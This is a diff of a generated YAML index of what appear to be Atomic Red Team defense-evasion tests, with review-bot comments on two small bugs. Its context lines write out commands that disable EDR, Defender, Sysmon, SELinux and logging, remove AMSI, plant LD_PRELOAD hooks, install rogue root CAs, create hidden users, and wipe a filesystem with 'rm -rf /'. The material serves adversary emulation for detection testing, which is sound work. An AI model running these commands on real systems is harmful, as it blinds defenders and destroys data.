@@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. - ' +' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw - ' +' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. - ' +' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log - ' +' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection - ' +' supported_platforms: - linux input_arguments: 
@@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: command: 'setenforce 0 - ' +' cleanup_command: 'setenforce 1 - ' +' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux - ' +' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: 
@@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper - ' +' supported_platforms: - macos executor: command: 'sudo spctl --master-disable - ' +' cleanup_command: 'sudo spctl --master-enable - ' +' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS - ' +' supported_platforms: - macos input_arguments: 
@@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded - ' +' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed - ' +' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded - ' +' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available - ' +' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed - ' +' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} - ' +' get_prereq_command: 'cmd /c sysmon -i -accepteula - ' +' executor: command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null - ' +' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. - ' +' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. - ' +' supported_platforms: - windows input_arguments: 
@@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. - ' +' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed - ' +' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
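Review bot: In the office-365 Disable-AntiPhishRule entry of the first hunk on this line, the two `default:` lines for `username` and `password` are now bare on the new side, which a YAML loader reads as null rather than an empty string; if the runner expects a string here, `default: ""` makes the intent explicit and survives reformatting. Since index.yaml is generated, the change belongs in the source atomic this entry is rendered from, and it only matters if the consumer distinguishes null from "" — worth confirming against the runner. The enclosing test definition starts outside the hunk.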
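Review bot: The prereq check for the /etc/ld.so.preload test in the last hunk on this line is still broken on the new side: `prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;` is missing the closing `}` of the `#{path_to_shared_library}` placeholder, so the argument is presumably never substituted and the shell most likely treats the `#`-prefixed word as a comment, leaving an unterminated `[` and a failing check before the library is ever tested. The sibling LD_PRELOAD entry in the following hunk spells the same placeholder correctly, so the one-character fix is `if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;`. Because index.yaml is generated, that fix belongs in the source atomic this entry is rendered from rather than in this file. The enclosing test definition starts outside the hunk.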
@@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} - ' +' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} - ' +' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: 
@@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} - ' +' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} - ' +' executor: command: 'del /f #{file_to_delete} - ' +' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'mkdir #{folder_to_delete} - ' +' executor: command: 'rmdir /s /q #{folder_to_delete} - ' +' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null - ' +' executor: command: 'Remove-Item -path #{file_to_delete} - ' +' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 
@@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null - ' +' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' +' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) - ' +' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null - ' +' executor: command: 'Remove-Item #{teamviewer_log_file} - ' +' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: 
@@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} - ' +' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +s #{file_to_modify} - ' +' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib 
@@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +h #{file_to_modify} - ' +' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) - ' +' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt - ' +' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) - ' +' supported_platforms: - macos input_arguments: 
@@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin - ' +' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} - ' +' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore - ' +' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos 
@@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files - ' +' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. - ' +' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: - ' +' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: - ' +' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} - ' +' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" - ' +' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} 
@@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl - ' +' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - ' +' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell - ' +' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil - ' +' supported_platforms: - windows input_arguments: 
@@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} - ' +' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: 
@@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
